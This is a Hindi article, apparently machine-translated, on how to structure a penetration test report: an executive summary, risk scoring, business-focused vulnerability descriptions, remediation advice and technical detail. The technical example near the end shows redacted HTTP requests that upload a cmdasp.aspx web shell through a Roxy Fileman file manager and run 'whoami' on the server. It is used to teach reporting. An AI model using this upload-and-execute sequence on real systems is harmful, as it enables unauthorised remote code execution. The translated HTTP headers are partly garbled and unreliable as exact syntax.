एक अनुभवी पेनटेस्टर, वह जानता है कि एक अच्छी तरह से लिखित रिपोर्ट इस तथ्य की विशेषता है कि इसकी प्रस्तुति के बाद ग्राहक के पास कोई अतिरिक्त प्रश्न नहीं होता है। ऐसा करने के लिए, इसमें विभिन्न ऑडियंस के लिए जानकारी के साथ कम से कम चार बुनियादी अनुभाग होने चाहिए।
धारा 1: सामान्य जानकारी और आंकड़े
जबकि बग को ठीक करने के लिए एक प्रोग्रामर को सभी तकनीकी विवरणों की आवश्यकता हो सकती है, प्रबंधन उपयोग की गई प्रौद्योगिकियों और विशेष शब्दावली को नहीं समझ सकता है। इसके बजाय, उन्हें व्यापार जोखिम को समझने की जरूरत है। बिजनेस लीडर्स के लिए यह समझना जरूरी है कि उनकी कंपनियों के लिए सूचित फैसले लेने के लिए क्या दांव पर है । पूरी रिपोर्ट में निहित जानकारी का एक सुलभ सारांश जोखिम entiling की सही समझ सुनिश्चित करने के लिए आवश्यक है । इसके अलावा, पहले खंड में औपचारिक जानकारी होनी चाहिए, यानी क्या परीक्षण किया गया था और किस अनुमति के साथ, जब इसका परीक्षण किया गया था, परीक्षणों में भाग लिया, जिसके आदेश पर परीक्षण किए गए थे। नीचे दिया गया आंकड़ा इस जानकारी के साथ नमूना तालिकाओं को दिखाता है।
| परीक्षण किया गया ऐप | SXXX dXXX http://XXXXX |
| भूमिकाओं का परीक्षण किया गया | प्रशासक, उपयोगकर्ता |
| परीक्षण की तिथि | 30.10.2017 – 13.12.2017 |
| परीक्षण की जगह | व्रोकला (रिमोट) |
| प्रमुख | मार्टिनएक्सएक्सएक्स |
| परीक्षक और रिपोर्ट लेखक | मीकल Kędzior |
| दस्तावेज़ संस्करण | 1.0 (15.12.2017) |
दृश्य संचार भी स्पष्ट रूप से पता चला सुरक्षा त्रुटियों का संदेश देने में मददगार हो सकता है । थोक डेटा की कल्पना करने में आपकी मदद करने के लिए सभी प्रकार के चार्ट और समान ग्राफिक तत्वों का उपयोग करें।
जोखिमों का आकलन करते समय, निम्नलिखित का पालन किया जाना चाहिए:
जोखिम = खतरा * घटना की संभावना * व्यापार पर प्रभाव।
जहां एक खतरा एक विशेष भेद्यता के साथ जुड़ा सामान्य जोखिम है। घटना की संभावना का मतलब है कि सुरक्षा त्रुटि का फायदा उठाना कितना मुश्किल है। व्यवसाय पर प्रभाव हमलावर के त्रुटि के उपयोग से जुड़े नुकसान को निर्धारित करता है। निम्नलिखित ग्राफिक एक तालिका प्रदान करता है जो भेद्यता डेटा के जोखिम का आकलन करने के लिए उपयोगी है। उदाहरण के लिए, यदि खतरा अधिक है और भेद्यता का फायदा उठाना बहुत आसान है (भेद्यता)-सी और प्रभाव औसत है-मध्यम, हमें कुल 24 अंक मिलते हैं, जिसका अर्थ है कि भेद्यता में औसत जोखिम होता है । एक अन्य आंकड़ा दिखाता है कि पता की गई कमजोरियों की मात्रा की कल्पना कैसे की जाए।
आपके जोखिम आकलन के आधार पर, रिपोर्ट प्राप्तकर्ता को पहले सबसे महत्वपूर्ण त्रुटियों को ठीक करना चाहिए। वे व्यापार के लिए सबसे बड़ा खतरा पैदा करते हैं और उच्च वित्तीय नुकसान में परिणाम कर सकते हैं ।
धारा 2: पता लगाया कमजोरियों का विवरण
अधिकांश प्रवेश परीक्षण रिपोर्ट किसी प्रकार की जोखिम मूल्यांकन प्रणाली का उपयोग करती हैं, लेकिन यह समझाने के लिए समय निकालना दुर्लभ है कि किसी दिए गए भेद्यता से जुड़े जोखिम क्या हैं। ग्राहक को मौजूदा सुरक्षा त्रुटियों के बारे में सूचित होने के बाद क्या कदम उठाने हैं, इसके बारे में त्वरित और सटीक निर्णय लेना चाहिए। इसमें अक्सर अतिरिक्त बजट की जरूरत होती है, जिसके लिए गैर-तकनीकी उच्च स्तरीय अधिकारियों से मंजूरी की जरूरत होती है ।
कठिन निर्णयों को आसान बनाने के लिए, इस तरह से पता लगाई गई कमजोरियों का वर्णन करें जो आपके व्यवसाय पर प्रभाव दिखाती है। उदाहरण के लिए, यदि एक महत्वपूर्ण भेद्यता का पता चला है जो किसी भी फ़ाइल को हेल्थकेयर पोर्टल पर स्थानांतरित करने की अनुमति दे सकता है, तो इसकी रिपोर्ट करने के दो तरीके हैं:
- तकनीकी रूप से सटीक – एक्स का वेब एप्लिकेशन फ़ाइलों के हस्तांतरण को टाइप करके प्रतिबंधित नहीं करता है, जिससे एक भेद्यता पैदा होती है जो हमलावर को कोड को दूर से निष्पादित करने और आवेदन के विशेषाधिकारों को ऊंचा करने की अनुमति दे सकती है।
- सटीक और प्रासंगिक दोनों – एक्स का वेब एप्लिकेशन फ़ाइल प्रकार द्वारा फ़ाइलों के हस्तांतरण को प्रतिबंधित नहीं करता है, एक भेद्यता पैदा करता है जो एक हमलावर को अवांछित कोड को दूर से निष्पादित करने और आवेदन में अपने विशेषाधिकारों को ऊंचा करने की अनुमति दे सकता है। इस मामले में, एक हमलावर किसी भी उपयोगकर्ता के मेडिकल रिकॉर्ड देख सकता है और आवेदन में एक प्रशासक के रूप में कार्य कर सकता है।
दूसरे तरीके से अधिक वजन है, न केवल तकनीकी पहलुओं की ओर इशारा करते हुए, लेकिन यह भी व्यापार पर प्रभाव के लिए । सबसे मूल्यवान रिपोर्ट उन है कि एक भाषा में सभी दर्शकों के लिए अपील कर रहे है कि लोगों को, विशेष रूप से नेतृत्व की स्थिति में, समझते हैं ।
धारा 3: मरम्मत सिफारिशें
सबसे महत्वपूर्ण चीजों में से एक है कि ग्राहक जो प्रवेश परीक्षण कमीशन पर निर्भर करता है पता चला सुरक्षा कमजोरियों के बाद की मरंमत है । इसे संभव बनाने के लिए, प्रवेश परीक्षक से यह संकेत मिलने की उम्मीद है कि पता की गई कमजोरियों का वर्णन करने के अलावा, पता लगाने वाली त्रुटियों से जुड़े जोखिमों की मरम्मत या उन्हें कैसे सुधारा जाए। यह अनुभाग मुख्य रूप से तकनीकी प्रशिक्षण वाले लोगों के लिए है जो सीधे आवेदन कोड, सर्वर विन्यास या डेटाबेस से संबंधित हैं। यह पाया सुरक्षा त्रुटियों को ठीक करने के तरीके का वर्णन बाहरी स्रोतों के लिए अतिरिक्त लिंक जोड़ने के लिए उपयोगी है । निम्नलिखित आंकड़ा विस्तृत संवेदनशील जानकारी प्रदर्शित करने वाली त्रुटि दिखाता है। इस डेटा में अक्सर तकनीकी जानकारी, कक्षाएं, त्रुटियों का कारण 10, सर्वर का सटीक संस्करण, या अनुप्रयोगों और विन्यास फ़ाइलों के सिस्टम पथ शामिल होते हैं।
निम्नलिखित एक त्रुटि के लिए एक उदाहरण सिफारिश है जो विस्तृत त्रुटि जानकारी प्रदर्शित करता है।
धारा 4: कमजोरियों का तकनीकी विवरण
अंतिम खंड में पाई गई कमजोरियों का तकनीकी विवरण होना चाहिए । डेवलपर्स के लिए यह समझना विशेष रूप से उपयोगी है कि एक बग क्या है और इसे करने के लिए आवश्यक चरणों का पुनर्निर्माण कैसे करें। यदि आपको समस्या के स्रोत का पता लगाने और बाद में सत्यापित करने की आवश्यकता है कि मरम्मत विधि प्रभावी है तो यह विशेष रूप से उपयोगी है।
निम्नलिखित सर्वर पर किसी भी फ़ाइल को अपलोड करने की संवेदनशीलता का एक विस्तृत तकनीकी विवरण है।
सर्वर/Content/Roxy_Fileman/एक फ़ाइल दर्शक है जो लॉग-इन उपयोगकर्ताओं को उचित अनुमतियों (परीक्षण प्रशासक खाता) के साथ उन्हें अपलोड करने की अनुमति देता है (सिस्टम पर आदेशों को निष्पादित करने वाली स्क्रिप्ट सहित):
सिस्टम पर कमांड निष्पादित करने वाली स्क्रिप्ट सर्वर पर अपलोड करने के साथ अनुरोध करें:
पोस्ट/एडमिन/रॉक्सीफाइलमैन/प्रोसेसर्रेक्सिस्ट?a= अपलोड HTTP/1.1
होस्ट: XXXXX
यूजर-एजेंट: मोज़िला/5.0 (X11; लिनक्स x86_64; rv:45.0) छिपकली/20100101 Firefox/45.0
स्वीकार करें: पाठ/html, आवेदन/xhtml + xml, आवेदन/xml;q=0.9,*/*;q=0.8
स्वीकार करें-भाषा: एन-यूएस, एन;क्यू=0.5
स्वीकार करें-एनकोडिंग: जीजीआईपी, डिफ्लेट
रेफरर: http://XXXXX/Content/Roxy_Fileman/
कुकी: XXXXX = 32b8a4de-a83d-45c8-8471-927e301a9b69; XXXXX=AFD96B4B580D29A3CDFC11265B5B4C4A942D164F2
कनेक्शन: क्लोज
कैश-कंट्रोल: मैक्स-एज =0
कंटेंट-टाइप: मल्टीपार्ट/फॉर्म-डेटा; सीमा=---------------------------13949612691104534433104770617
सामग्री-लंबाई: 1861
-----------------------------13949612691104534433104770617
सामग्री-स्वभाव: फॉर्म-डेटा; नाम ="कार्रवाई"
अपलोड -----------------------------13949612691104534433104770617
सामग्री-स्वभाव: फॉर्म-डेटा; नाम ="d" -----------------------------13949612691104534433104770617
सामग्री-स्वभाव: फॉर्म-डेटा; नाम ="फ़ाइलें [];;filename="cmdasp.aspx"Content-Type:
एप्लीकेशन/ऑक्टेट-स्ट्रीम
<%@ Page Language="C#" Debug="true" Trace="false" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
एक सफल स्क्रिप्ट अपलोड प्रतिक्रिया के साथ सर्वर प्रतिक्रिया:
पोस्ट/एडमिन/रॉक्सीफाइलमैन/प्रोसेसर्रेक्सिस्ट?a= अपलोड HTTP/1.1
होस्ट: XXXXX
यूजर-एजेंट: मोज़िला/5.0 (X11; लिनक्स x86_64; rv:45.0) छिपकली/20100101 Firefox/45.0
HTTP/1.1 200 ठीक
कैश-कंट्रोल: निजी
सामग्री-प्रकार: पाठ/html; charset=utf-8
सर्वर: माइक्रोसॉफ्ट-IIS/10.0
X-AspNetMvc-संस्करण: 5.1
X-AspNet-संस्करण: 4.0.30319
सेट-कुकी: XXXXX=32b8a4de-a83d-45c8-8471-927e301a9b69; 09-नवंबर-2018 16:53:07 GMT; path=/; HttpOnly
X-संचालित-द्वारा: ASP.NET
तिथि: Thu, 09 Nov 2017 16:53:07 GMT
कनेक्शन: बंद
सामग्री-लंबाई: 60
अपलोड किए गए संसाधन को सर्वर/मीडिया/अपलोड/फाइल नाम
पर प्राधिकरण के बिना एक्सेस किया जा सकता है
निष्पादित करने के लिए कमांड के साथ सर्वर करने का अनुरोध – वर्तमान सिस्टम उपयोगकर्ता को प्रदर्शित करने वाला whoami:
पोस्ट/मीडिया/अपलोड/cmdasp.aspx HTTP/1.1
मेजबान: XXXXX
उपयोगकर्ता-एजेंट: मोजिला/5.0 (X11; लिनक्स x86_64; rv:45.0) छिपकली/20100101 Firefox/45.0
स्वीकार करें: पाठ/html, आवेदन/xhtml +xml, आवेदन/xml;q=0.9,*/*;q=0.8 स्वीकार करें-भाषा: एन-यूएस, एन;क्यू=0.5
स्वीकार करें-एनकोडिंग: जीजीआईपी, Deflate
रेफरर: http://XXXXX/media/uploaded/cmdasp.aspx
कुकी: XXXXX = 32b8a4de-a83d-45c8-8471-927e301a9b69;
XXXXX=AFD96B4B580D29A3CDFC11265B5B4C4A942D164F2D
कनेक्शन: क्लोज
कंटेंट-टाइप: एप्लीकेशन/एक्स-www-फॉर्म-यूरेनकोडेड
कंटेंट-लेंथ: 290
[...]
EVENTVALIDATION=%2FwEdAANRJmrtf23QBZNDbQYsx5itsAmaVIY7AayhB9duwcnk2J
DuMxrvKtMBUSvskgfELw WmgNGW8Lr4a8NezI%2FkHrIsB%2FLodYxPpo9ud%2FbHu4w%3D%3D&txtArg=whoami&testing=excute
सर्वर प्रतिक्रिया आदेश के निष्पादन की पुष्टि:
फाइलों को अपलोड करने के तंत्र की पहचान निम्नलिखित पतों पर की जाती है:
- /एडमिन/चालान/चालान
- /एडमिन/चालान/चालान ी सूची
- /एडमिन/न्यूजलेटर/ग्रुपसब्सक्रिप्शनलिस्ट
- /एडमिन/न्यूजलेटर/सब्सक्रिप्शनलिस्ट
- /Content/Roxy_Fileman/index.html
सुरक्षा त्रुटियों को पूरी तरह से समाप्त नहीं किया जाएगा । वे सुरक्षा विकास जीवनचक्र प्रक्रिया (जिसमें विभिन्न सुरक्षा परीक्षण और स्रोत कोड ऑडिट शामिल हैं) के कार्यान्वयन के बावजूद माइक्रोसॉफ्ट उत्पादों दोनों में दिखाई देते हैं, और लिनक्स गिरी में।वे ओपन सोर्स प्रोजेक्ट्स और उन दोनों में पाए जा सकते हैं जहां कोड बंद है। एक महत्वपूर्ण मुद्दा यह है कि प्रवेश परीक्षण आयोजित करते समय संवेदनशीलता का पता न लगाना इस तथ्य का पर्याय नहीं है कि वे वहां नहीं हैं । इसका मतलब सिर्फ इतना है कि सीमित समय में और कुछ साधनों, ज्ञान और अनुभव का इस्तेमाल करते हुए पेनेस्टर उन्हें नहीं ढूंढ पाए। फिर भी, प्रवेश परीक्षणों के परिणामों को देखते हुए, आवेदन की गुणवत्ता के बारे में निष्कर्ष निकाले जा सकते हैं, या अधिक महत्वपूर्ण रूप से खोजी गई त्रुटियों के मामले में, पता लगाएं कि वे क्या जोखिम उठाते हैं।
